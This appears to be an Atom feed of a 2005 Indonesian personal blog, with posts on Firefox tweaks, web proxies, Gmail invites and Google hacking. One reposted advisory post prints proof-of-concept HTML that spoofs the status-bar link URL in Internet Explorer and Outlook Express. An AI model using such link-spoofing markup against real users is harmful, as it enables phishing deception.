<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-10455602</id><updated>2011-11-17T22:21:21.881+08:00</updated><title type='text'>.:: ZONE - D ::.</title><subtitle type='html'>Zone-D is a blog containing whatever someone named D feels like putting in it. So the content is not fixed; it depends on D's mood. The one sure thing is "Hopefully It's Useful", and anything done as a result of reading Zone-D is outside "D"'s responsibility.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>13</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-10455602.post-110989786123765774</id><published>2005-03-04T08:50:00.000+08:00</published><updated>2005-03-04T15:00:10.246+08:00</updated><title type='text'>Tinkering with the Firefox Browser</title><content type='html'>&lt;div style="text-align: justify;"&gt;The idea for this 
post came from &lt;a href="http://thestoopid.tk/" target="_blank"&gt;Adi&lt;/a&gt;, who, with my thanks, told me about hacking Firefox...&lt;br /&gt;After searching on good old Google, I finally found it.&lt;br /&gt;Below is an article written by our friend &lt;a href="http://www.i-hacked.com/content/view/59/42/" target="_blank"&gt;hevnsnt&lt;/a&gt;, which I then tried to translate into Indonesian; please bear with me if it is a bit off...&lt;br /&gt;&lt;br /&gt;OK, &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox &lt;/a&gt;is my favorite browser; if you are not using it (say you only use... gasp, I.E.) you need a change. So I decided to write an article on how to "hack" Firefox to make it better. With a few tweaks here and there, we make Firefox faster, enable the "advanced tab options", make new versions compatible with older extensions, run it directly from a "Flash Disk", and so on.&lt;br /&gt;&lt;br /&gt;First, let's change some hidden options to make it faster.&lt;br /&gt;1. Open Firefox 1.0 and in the "&lt;span style="font-weight: bold;"&gt;address bar&lt;/span&gt;" type "&lt;span style="font-weight: bold;"&gt;about:config&lt;/span&gt;", then press Enter or click the "GO" button.&lt;br /&gt;2. Type "&lt;span style="font-weight: bold;"&gt;browser.tabs.showSingleWindowModePrefs&lt;/span&gt;" into the "&lt;span style="font-weight: bold;"&gt;filter bar&lt;/span&gt;" (no need to press Enter, it shows up by itself...); it will appear under &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; with the value "&lt;span style="font-weight: bold;"&gt;false&lt;/span&gt;". Double-click "browser.tabs.showSingleWindowModePrefs" and the value changes to "&lt;span style="font-weight: bold;"&gt;true&lt;/span&gt;".&lt;br /&gt;3. 
Ketikan "&lt;span style="font-weight: bold;"&gt;network.http.pipelining&lt;/span&gt;" pada "&lt;span style="font-weight: bold;"&gt;filter bar&lt;/span&gt;" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; ada nongol dengan value "&lt;span style="font-weight: bold;"&gt;false&lt;/span&gt;", nah lalu "di-klik 2 kali "network.http.pipelining", dan value akan berubah jadi "&lt;span style="font-weight: bold;"&gt;true&lt;/span&gt;"&lt;br /&gt;4. Ketikan "&lt;span style="font-weight: bold;"&gt;network.http.pipelining.maxrequests&lt;/span&gt;" pada "filter bar" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; ada nongol dengan value "&lt;span style="font-weight: bold;"&gt;4&lt;/span&gt;", nah lalu "di-klik 2 kali " network.http.pipelining.maxrequests", dan ubah value menjadi "&lt;span style="font-weight: bold;"&gt;100&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Apa yang berubah ??&lt;/span&gt;&lt;br /&gt;1. Memungkinkan "advanced tab option" pada "Tools/Options page" browser anda.&lt;br /&gt;2. Memungkinkan "option" # 3.&lt;br /&gt;3. Membuat Firefox menggunakan 8 "thread" di tiap page. 
In short, your Firefox will be faster than before.&lt;br /&gt;&lt;br /&gt;Second, let's make it even better..&lt;br /&gt;Visit the Mozilla Firefox "&lt;a href="https://update.mozilla.org/themes/?application=%7Bec8030f7-c20a-464f-9b0e-13a3a9e97384%7D" target="_blank"&gt;Theme Page&lt;/a&gt;" and pick a theme.&lt;br /&gt;I use the Noia eXtreme skin.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://www.i-hacked.com/images/stories/Noia_2_0_eXtreme_For_Firefox_by_Kasteo.png.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt; Now let our tweaks do their work...&lt;br /&gt;One of the most appealing things about Firefox is its support for &lt;a href="http://texturizer.net/firefox/extensions/" target="_blank"&gt;extensions&lt;/a&gt;. At the time of writing, there are 226 extensions we can use to make it better. I will only touch on a few of them.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=10&amp;amp;vid=664" target="_blank"&gt;Adblock&lt;/a&gt;: Blocks ads.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=14&amp;amp;vid=1187" target="_blank"&gt;Bookmarks Synchronizer&lt;/a&gt;: Saves your bookmarks to an XML file and syncs it with an FTP server.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/clav/#digger" target="_blank"&gt;Digger&lt;/a&gt;: Navigates to parent directories, offers a button to the FTP equivalent of the location, to subdomains, etc. 
Very helpful when "scouting" a site.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/downsort" target="_blank"&gt;Download Sort&lt;/a&gt;: Automatically puts downloaded files into the folder or directory we choose.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=173&amp;amp;vid=504" target="_blank"&gt;Gmail Notifier&lt;/a&gt;: Notifies you when you get new email (provided you have a Gmail account).&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=262&amp;amp;vid=1194" target="_blank"&gt;Google Pagerank Status&lt;/a&gt;: Shows the Google PageRank of the page you are visiting.&lt;br /&gt;&lt;a href="http://refspoof.mozdev.org/index.html" target="_top"&gt;refspoof&lt;/a&gt;: "Spoof" your referrer (I don't know what that means, hehehe).&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/spiderzilla" target="_blank"&gt;Spiderzilla&lt;/a&gt;: Downloads a whole page into a local directory.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?id=137" target="_blank"&gt;Super DragAndGo&lt;/a&gt;: Drag a link onto a blank page and a new "Tab" opens.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=125&amp;amp;vid=1144" target="_blank"&gt;SwitchProxy&lt;/a&gt;: Manages multiple proxies.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=59&amp;amp;vid=617" target="_blank"&gt;User Agent Switcher&lt;/a&gt;: Switches your browser's user agent.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/x" target="_blank"&gt;x&lt;/a&gt;: A "Paranoia" toolbar button; one click clears all "History", "Form Info", saved passwords, download history, cookies and cache.&lt;br /&gt;&lt;br /&gt;Tell Firefox 
what we want and what we don't want...&lt;br /&gt;Tired of Google ads? Let's tinker with Firefox so that it doesn't display them (yes, including those in Gmail). Be careful: by removing these ads, we are violating Gmail's terms.&lt;br /&gt;This is done by editing the CSS file that Firefox calls UserContent.CSS.&lt;br /&gt;To edit that CSS file, I suggest you first download the "&lt;a href="http://texturizer.net/firefox/extensions/#chromedit" target="_blank"&gt;ChromEdit&lt;/a&gt;" plugin to make the job easier. Install the plugin, then restart Firefox.&lt;br /&gt;In Firefox, click "Tools/Edit User Files"; a new window opens with 5 tabs across the top. Click the tab labeled "UserContent.CSS". Then click the link below, copy everything, paste it into the UserContent.CSS file and save... and you're done.&lt;br /&gt;Here is the CSS code: &lt;a href="http://www.i-hacked.com/freefiles/removeads.txt" target="_blank"&gt;Code&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Ta-da, the Google ads are gone .......&lt;br /&gt;Well... 
that's all for my post....&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110989786123765774?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.i-hacked.com/content/view/59/42/' title='Utak Atik Browser Firefox'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110989786123765774/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110989786123765774' title='55 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110989786123765774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110989786123765774'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/03/utak-atik-browser-firefox.html' title='Utak Atik Browser Firefox'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>55</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110972248283954956</id><published>2005-03-02T08:07:00.000+08:00</published><updated>2005-03-02T09:41:46.683+08:00</updated><title type='text'>Firefox, the safest browser ???</title><content type='html'>I only just learned that I.E.'s toughest competitor is the browser released by Mozilla, namely: &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox&lt;/a&gt;.&lt;br /&gt;According to netizens, this browser is the safest, and it looks like I.E. is going to get pushed asideeee....&lt;br /&gt;From experience, when a piece of software becomes a big 
hit it usually... ends up not being free.., for example httrack, which is no longer free at &lt;a href="http://httrack.com/" target="_blank"&gt;httrack.com&lt;/a&gt; . Too bad, because that program is great for grabbing the contents of an entire website.&lt;br /&gt;So while it is still free, hurry up and download this browser: &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox&lt;br /&gt;&lt;/a&gt;while it's free, and perhaps for netizens who are getting bored of using I.E.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110972248283954956?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1' title='Firefox browser teraman ???'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110972248283954956/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110972248283954956' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110972248283954956'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110972248283954956'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/03/firefox-browser-teraman.html' title='Firefox browser teraman ???'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' 
src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110956608315671473</id><published>2005-02-28T12:35:00.000+08:00</published><updated>2005-02-28T12:48:03.156+08:00</updated><title type='text'>My layout...</title><content type='html'>Looking around other people's blogs...., some have a nice layout, some have good content, and I get confused: do you actually have to pick one or the other to be good,&lt;br /&gt;when I made this blog, I didn't want a particularly fancy layout; my *inner voice* said the content is what matters......, and now my *inner voice* says "better if the layout is nice too"..... and yet my blog's content isn't all that good now either, hahahaha....&lt;br /&gt;What made me want a nice blog layout was seeing the sites &lt;a href="http://cssvault.com/"&gt;CSSVAULT&lt;/a&gt;&lt;a&gt; and &lt;/a&gt;&lt;a href="http://www.cssbeauty.com/"&gt;CSSBEAUTY&lt;/a&gt;   *tsk tsk*&lt;br /&gt;Maybe one day I'll change this layout too...&lt;br /&gt;What's certain is that right now I want a 3-column blog... don't know why..&lt;br /&gt;Hmmm... 
but usually nice-looking blogs use lots of images, and that makes them slow to load; can this dilemma be solved ???&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110956608315671473?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110956608315671473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110956608315671473' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110956608315671473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110956608315671473'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/leiotku.html' title='Leiotku...'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110870490292399610</id><published>2005-02-18T13:16:00.000+08:00</published><updated>2005-02-18T13:35:02.926+08:00</updated><title type='text'>Phishing hole found in IE and OE</title><content type='html'>&lt;div align="justify"&gt;Another major vulnerability has been found in Microsoft's Internet Explorer and Outlook Express. 
The flaw is in the way that these applications can be manipulated in simple HTML code to display an URL other than the one specified in a link, to be displayed in the status bar.&lt;br /&gt;The status bar is the first place users look, or at least should look when following any link in an email or on a website to ensure that the link is taking them to where it says it is. HTML that utilizes this vulnerability can change what is displayed in the status bar of these applications, thus leading to a possible major phishing hole that can be used in very serious ways.&lt;br /&gt;Proof of concept code has been released and a description of how the flaw is utilized has been published. Below is an example of the flaw, and if you are using Internet Explorer to view this page, then in the status bar, you will see eBay.com, however if you are using Firefox, then you will see spreadfirefox.com. If you click on the link in Internet Explorer you will be directed to spreadfirefox.com, however in Firefox, you will go to eBay.com.&lt;br /&gt;Here is the code:&lt;/div&gt;&lt;div align="justify"&gt;&lt;/div&gt;&lt;p align="justify"&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;a id="SPOOF" href="http://spreadfirefox.com"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;div&amp;gt;&lt;br /&gt;&amp;lt;a href="http://ebay.com" target="_blank"&amp;gt;&lt;br /&gt;&amp;lt;table&amp;gt;&lt;br /&gt;&amp;lt;caption&amp;gt;&lt;br /&gt;&amp;lt;a href="http://ebay.com" target="_blank"&amp;gt;&lt;br /&gt;&amp;lt;label for="SPOOF"&amp;gt;&lt;br /&gt;&amp;lt;u style="cursor: pointer; color: blue"&amp;gt;&lt;br /&gt;ebay.com&lt;br /&gt;&amp;lt;/u&amp;gt;&lt;br /&gt;&amp;lt;/label&amp;gt;&lt;br /&gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;/caption&amp;gt;&lt;br /&gt;&amp;lt;/table&amp;gt;&lt;br /&gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt; &lt;/p&gt;&lt;p align="justify"&gt;&lt;br /&gt;      An example and this article can be seen at: &lt;a 
href="http://habaneronetworks.com/viewArticle.php?ID=140"&gt;http://habaneronetworks.com/viewArticle.php?ID=140&lt;/a&gt; &amp; &lt;a href="http://www.securityfocus.com/archive/1/390784"&gt;http://www.securityfocus.com/archive/1/390784&lt;/a&gt; If you did use Internet Explorer to open the link, then maybe you should read about Firefox here, and consider switching. Mozilla also has a beautiful product to replace Outlook Express too.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110870490292399610?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://habaneronetworks.com/viewArticle.php?ID=140' title='Phishing hole found in IE and OE'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110870490292399610/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110870490292399610' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110870490292399610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110870490292399610'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/phishing-hole-found-in-ie-and-oe_18.html' title='Phishing hole found in IE and OE'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110844238947146328</id><published>2005-02-15T12:37:00.000+08:00</published><updated>2005-02-15T12:39:49.473+08:00</updated><title type='text'>Valentine's Day: Everyone's 
having sex today but YOU</title><content type='html'>&lt;div align="justify"&gt;It's Valentine's Day. Half of the country will be f--king like wild billy-goats. The other half will just be f--king bitter. The good folks at Durex have something for both camps. The former can indulge in the contraceptive concern's wide range of STD- and pregnancy-busting prophylactics. And for the latter, nothing less than an international-sized reminder of how much play they're missing out on. Durex, a subsidiary of London-based SSL International, recently released their annual survey of sexual behavior around the world. The "Global Sex Survey," now in its eighth year, polled more than 350,000 people from 41 countries, and is billed as the largest such study around. Among the 16 questions, the following six stood out to me (I only listed results for first place, Canada, global average, India, U.K., U.S. and last place)... &lt;blockquote&gt;waw...ckckckc&lt;/blockquote&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110844238947146328?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://boingboing.net/' title='Valentine&apos;s Day: Everyone&apos;s having sex today but YOU'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110844238947146328/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110844238947146328' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110844238947146328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110844238947146328'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/valentines-day-everyones-having-sex.html' title='Valentine&apos;s Day: 
Everyone&apos;s having sex today but YOU'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110834997706046169</id><published>2005-02-14T10:21:00.000+08:00</published><updated>2005-02-14T10:59:37.063+08:00</updated><title type='text'>Wanna be hacker or Wanna be invisible ?</title><content type='html'>&lt;div align="justify"&gt;I didn't expect it, but it turns out some people do stop by this site of mine...&lt;br /&gt;Oh, and for friends who want to learn hacking, you can visit &lt;a href="http://hackthissite.org"&gt;http://hackthissite.org&lt;/a&gt; , but you have to register first; it's fun to play around with. If you want to level up quickly, you can open the tutorial at &lt;a href="http://johnny.ihackstuff.com"&gt;http://johnny.ihackstuff.com&lt;/a&gt; (look for the download section; registration is also required), but (again) it needs a little modification because the game server has moved.&lt;/div&gt;&lt;div align="justify"&gt;Hmm..., something else I just read about: proxies. It turns out that besides changing the proxy in the browser, we can also go through the web ... (hehehe... turns out I'm still totally clueless about tech..). Friends who want to surf "in secret" can use the links provided on the site  &lt;a href="http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm"&gt;http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm&lt;/a&gt;, or go directly to &lt;a href="http://anonymouse.ws/"&gt;http://anonymouse.ws/&lt;/a&gt; ; by going through that site, the sites we open stay hidden from people who want to look at our history.&lt;/div&gt;&lt;div align="justify"&gt;Hmm, sorry, for those who already know, this info is probably stale, but it may be useful for those who don't know it yet. 
(hehehehe...)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110834997706046169?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110834997706046169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110834997706046169' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110834997706046169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110834997706046169'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/wanna-be-hacker-or-wanna-be-invisible.html' title='Wanna be hacker or Wanna be invisible ?'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110758261571622379</id><published>2005-02-05T13:24:00.000+08:00</published><updated>2005-02-18T13:40:08.906+08:00</updated><title type='text'>Today's Activities</title><content type='html'>&lt;div align="justify"&gt;As usual, I still don't have much work at the office, so my browsing hobby keeps getting indulged (hehehe...), though I got confused for a bit: with so many websites open, I no longer knew what else I wanted to read..... 
oh, and I felt dumb too, because only just now did I understand what RSS is (hahahaha....); I looked it up here: [ &lt;a href="http://www.google.co.id/search?num=100&amp;hl=id&amp;amp;q=rss&amp;btnG=Mesin+Cari+Google&amp;amp;meta=cr=countryID"&gt;.:: click here ::.&lt;/a&gt; ]&lt;br /&gt;that's okay, better than not knowing at all..... :p&lt;br /&gt;then about the website [ &lt;a href="http://binaraga.info"&gt;http://binaraga.info&lt;/a&gt; ] : I'm puzzled that in this day and age you have to pay for health information.., hmmmm *annoyed*, but before they made the site like that, I had already downloaded the whole website (hehehe...)..... {I downloaded it with httrack, which you can get at [ &lt;a href="http://www.httrack.com"&gt;http://www.httrack.com&lt;/a&gt; ]}; the content is great, and I happen to be working hard on building my body :)&lt;br /&gt;So what I browsed today: [ &lt;a href="http://zone-h.org"&gt;http://zone-h.org&lt;/a&gt; ], [ &lt;a href="http://www.jasakom.com/Artikel.asp?ID=575"&gt;http://www.jasakom.com/Artikel.asp?ID=575&lt;/a&gt; ] hmmm that's it... I also hung around for a long time at [ &lt;a href="http://angkringan.or.id"&gt;http://angkringan.or.id&lt;/a&gt; ]&lt;br /&gt;........... have a nice weekend..?!?! 
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110758261571622379?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110758261571622379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110758261571622379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110758261571622379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110758261571622379'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/kegiatan-hari-ini.html' title='Kegiatan Hari Ini'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110732687746839738</id><published>2005-02-02T14:38:00.000+08:00</published><updated>2005-02-02T14:47:57.466+08:00</updated><title type='text'>Tips for Getting a Gmail Address</title><content type='html'>Anyone want an email address at gmail.com but can't sign up yet.... here is a small solution, sorry if this post is a bit stale.. :), I'm just sharing for those who don't know yet :P. If I'm not mistaken, Gmail registration is still closed unless you are invited.. well, for Gmail invites there is a solution from Johnny Long, modified a little :)&lt;br /&gt;&lt;br /&gt;&lt;a 
href="http://groups-beta.google.com/groups?as_q=allintext%3A+gmail&amp;num=10&amp;amp;scoring=r&amp;hl=en&amp;amp;ie=UTF-8&amp;as_epq=intext%3Ahttp+intext%3Agmail+intext%3Agoogle+intext%3Acom+intext%3Agmail+intext%3Aa&amp;amp;as_oq=invite+invit%C3%A9&amp;as_eq=&amp;amp;as_ugroup=&amp;as_usubject=&amp;amp;as_uauthors=&amp;lr=&amp;amp;as_drrb=q&amp;as_qdr=d&amp;amp;as_mind=1&amp;as_minm=1&amp;amp;as_miny=2005&amp;as_maxd=1&amp;amp;as_maxm=2&amp;as_maxy=2005&amp;amp;safe=off"&gt;.:: just click ::.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Once everything is open: look at the date and time the invite was posted, and take the newest one so it hasn't expired..... :)&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110732687746839738?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110732687746839738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110732687746839738' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110732687746839738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110732687746839738'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/tips-bikin-email-di-gmail.html' title='Tips Bikin Email Di Gmail'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' 
src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110731069495725935</id><published>2005-02-02T10:13:00.000+08:00</published><updated>2005-02-02T10:18:14.956+08:00</updated><title type='text'>Google Hacking Mini-Guide #2</title><content type='html'>By Johnny Long.&lt;br /&gt;&lt;br /&gt;Google Automated Scanning&lt;br /&gt;Google frowns on automation: "You may not send automated queries of any sort to Google's system without express permission in advance from Google. Note that 'sending automated queries' includes, among other things:&lt;br /&gt;- using any software which sends queries to Google to determine how a web site or web page 'ranks' on Google for various queries;&lt;br /&gt;- 'meta-searching' Google; and&lt;br /&gt;- performing 'offline' searches on Google."&lt;br /&gt;Any user running an automated Google querying tool (with the exception of tools created with Google's extremely limited API) must obtain express permission in advance to do so. It's unknown what the consequences of ignoring these terms of service are, but it seems best to stay on Google's good side.&lt;br /&gt;&lt;br /&gt;Gooscan&lt;br /&gt;Gooscan is a UNIX (Linux/BSD/Mac OS X) tool that automates queries against Google search appliances (which are not governed by the same automation restrictions as their web-based brethren). For the security professional, gooscan serves as a front end for an external server assessment and aids in the information-gathering phase of a vulnerability assessment. For the web server administrator, gooscan helps discover what the web community may already know about a site thanks to Google's search appliance.&lt;br /&gt;For more information about this tool, including the ethical implications of its use, see &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Googledorks&lt;br /&gt;The term "googledork" was coined by the author and originally meant "An inept or foolish person as revealed by Google." 
